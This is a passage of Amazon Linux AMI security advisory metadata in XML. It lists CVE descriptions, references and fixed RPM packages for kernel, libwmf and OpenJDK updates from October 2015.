arch="x86_64"><filename>Packages/php55-mcrypt-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.30-1.110.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.30" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.30-1.110.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-603</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-603: medium priority package update for kernel</title><issued date="2015-10-27 13:40:00" /><updated date="2017-10-13 00:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000253:
A flaw was found in the way the Linux kernel loaded ELF executables. Provided that an application was built as Position Independent Executable (PIE), the loader could allow part of that application&#039;s data segment to map over the memory area reserved for its stack, potentially resulting in memory corruption. An unprivileged local user with access to SUID (or otherwise privileged) PIE binary could use this flaw to escalate their privileges on the system.
1492212:
CVE-2017-1000253 kernel: load_elf_ binary() does not take account of the need to allocate sufficient space for the entire binary
CVE-2015-8787:
A NULL-pointer dereference vulnerability was found in the Linux kernel&#039;s TCP stack, in net/netfilter/nf_nat_redirect.c in the nf_nat_redirect_ipv4() function. A remote, unauthenticated user could exploit this flaw to create a system crash (denial of service).
1300731:
CVE-2015-8787 kernel: Missing NULL pointer check in nf_nat_redirect_ipv4
CVE-2015-7613:
Race condition in the IPC object implementation in the Linux kernel through 4.2.3 allows local users to gain privileges by triggering an ipc_addid call that leads to uid and gid comparisons against uninitialized data, related to msg.c, shm.c, and util.c.
1268270:
CVE-2015-7613 kernel: Unauthorized access to IPC objects with SysV shm
CVE-2015-2925:
1209367:
CVE-2015-2925 Kernel: vfs: Do not allow escaping from bind mounts
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2925" title="" id="CVE-2015-2925" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7613" title="" id="CVE-2015-7613" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8787" title="" id="CVE-2015-8787" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000253" title="" id="CVE-2017-1000253" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.1.10-17.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="perf" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.1.10" release="17.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.1.10-17.31.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.1.10" release="17.31.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.1.10-17.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-604</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-604: important priority package update for libwmf</title><issued date="2015-10-27 13:51:00" /><updated date="2015-10-27 14:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4696:
It was discovered that libwmf did not properly process certain WMF files. By tricking a victim into opening a specially crafted WMF file in an application using libwmf, a remote attacker could possibly exploit this flaw to cause a crash or execute arbitrary code with the privileges of the user running the application.
CVE-2015-4695:
It was discovered that libwmf did not properly process certain WMF files. By tricking a victim into opening a specially crafted WMF file in an application using libwmf, a remote attacker could possibly exploit this flaw to cause a crash.
CVE-2015-4588:
It was discovered that libwmf did not correctly process certain WMF (Windows Metafiles) with embedded BMP images. By tricking a victim into opening a specially crafted WMF file in an application using libwmf, a remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the application.
CVE-2015-0848:
It was discovered that libwmf did not correctly process certain WMF (Windows Metafiles) with embedded BMP images. By tricking a victim into opening a specially crafted WMF file in an application using libwmf, a remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the application.
CVE-2009-3546:
The _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.x before 5.3.1, and the GD Graphics Library 2.x, does not properly verify a certain colorsTotal structure member, which might allow remote attackers to conduct buffer overflow or buffer over-read attacks via a crafted GD file, a different vulnerability than CVE-2009-3293. NOTE: some of these details are obtained from third party information.
A missing input sanitization flaw, leading to a buffer overflow, was discovered in the gd library. A specially-crafted GD image file could cause an application using the gd library to crash or, possibly, execute arbitrary code when opened.
A missing input sanitization flaw, leading to a buffer overflow, was discovered in PHP's gd library. A specially-crafted GD image file could cause the PHP interpreter to crash or, possibly, execute arbitrary code when opened.
529213:
CVE-2009-3546 gd: insufficient input validation in _gdGetColors()
CVE-2007-3473:
The gdImageCreateXbm function in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to cause a denial of service (crash) via unspecified vectors involving a gdImageCreate failure.
A flaw was discovered in the gd X BitMap (XBM) image-handling code. A malformed or truncated XBM image could cause a crash in an application using the gd library.
276791:
CVE-2007-3473 libgd NULL pointer dereference when reading a corrupt X bitmap
CVE-2007-3472:
Integer overflow in gdImageCreateTrueColor function in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to have unspecified attack vectors and impact.
An integer overflow was discovered in the gdImageCreateTrueColor() function, leading to incorrect memory allocations. A carefully crafted image could cause a crash or possibly execute code with the privileges of the application using the gd library.
276751:
CVE-2007-3472 libgd Integer overflow in TrueColor code
CVE-2007-2756:
The gdPngReadData function in libgd 2.0.34 allows user-assisted attackers to cause a denial of service (CPU consumption) via a crafted PNG image with truncated data, which causes an infinite loop in the png_read_info function in libpng.
An infinite-loop flaw was discovered in the PHP gd extension. A script that could be forced to process PNG images from an untrusted source could allow a remote attacker to cause a denial of service.
A flaw was discovered in the gd PNG image handling code. A truncated PNG image could cause an infinite loop in an application using the gd library.
242033:
CVE-2007-2756 gd / php-gd ImageCreateFromPng infinite loop caused by truncated PNG
CVE-2007-0455:
Buffer overflow in the gdImageStringFTEx function in gdft.c in GD Graphics Library 2.0.33 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted string with a JIS encoded font.
A buffer over-read flaw was discovered. This could cause a crash in an application using the gd library to render certain strings using a JIS-encoded font.
A buffer over-read flaw was discovered in PHP's gd extension. A script that could be forced to write arbitrary string using a JIS font from an untrusted source could cause the PHP interpreter to crash.
224607:
CVE-2007-0455 gd buffer overrun
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0455" title="" id="CVE-2007-0455" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2756" title="" id="CVE-2007-2756" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3472" title="" id="CVE-2007-3472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3473" title="" id="CVE-2007-3473" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3546" title="" id="CVE-2009-3546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0848" title="" id="CVE-2015-0848" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4588" title="" id="CVE-2015-4588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4695" title="" id="CVE-2015-4695" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4696" title="" id="CVE-2015-4696" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1917.html" title="" id="RHSA-2015:1917" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwmf-lite" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-lite-0.2.8.4-41.11.amzn1.x86_64.rpm</filename></package><package name="libwmf-devel" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-devel-0.2.8.4-41.11.amzn1.x86_64.rpm</filename></package><package name="libwmf-debuginfo" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-debuginfo-0.2.8.4-41.11.amzn1.x86_64.rpm</filename></package><package name="libwmf" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-0.2.8.4-41.11.amzn1.x86_64.rpm</filename></package><package name="libwmf-debuginfo" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-debuginfo-0.2.8.4-41.11.amzn1.i686.rpm</filename></package><package name="libwmf-devel" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-devel-0.2.8.4-41.11.amzn1.i686.rpm</filename></package><package name="libwmf" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-0.2.8.4-41.11.amzn1.i686.rpm</filename></package><package name="libwmf-lite" version="0.2.8.4" release="41.11.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-lite-0.2.8.4-41.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-605</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-605: critical priority package update for java-1.7.0-openjdk</title><issued date="2015-10-27 13:52:00" /><updated date="2015-10-27 14:14:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4911:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4903:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4893:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4883:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4882:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4881:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4872:
It was discovered that the Security component in OpenJDK failed to properly check if a certificate satisfied all defined constraints. In certain cases, this could cause a Java application to accept an X.509 certificate which does not meet requirements of the defined policy.
CVE-2015-4860:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4844:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4843:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4842:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4840:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4835:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4806:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4805:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4803:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4734:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4734" title="" id="CVE-2015-4734" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4803" title="" id="CVE-2015-4803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4805" title="" id="CVE-2015-4805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4806" title="" id="CVE-2015-4806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4835" title="" id="CVE-2015-4835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4840" title="" id="CVE-2015-4840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4842" title="" id="CVE-2015-4842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4843" title="" id="CVE-2015-4843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4844" title="" id="CVE-2015-4844" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4860" title="" id="CVE-2015-4860" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4872" title="" id="CVE-2015-4872" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4881" title="" id="CVE-2015-4881" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4882" title="" id="CVE-2015-4882" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4883" title="" id="CVE-2015-4883" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4893" title="" id="CVE-2015-4893" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4903" title="" id="CVE-2015-4903" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4911" title="" id="CVE-2015-4911" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1920.html" title="" id="RHSA-2015:1920" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.91-2.6.2.2.63.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.91-2.6.2.2.63.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.91-2.6.2.2.63.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.91-2.6.2.2.63.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.91-2.6.2.2.63.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.91-2.6.2.2.63.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.91-2.6.2.2.63.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.91-2.6.2.2.63.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.91-2.6.2.2.63.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.91-2.6.2.2.63.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.91-2.6.2.2.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-606</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-606: important priority package update for 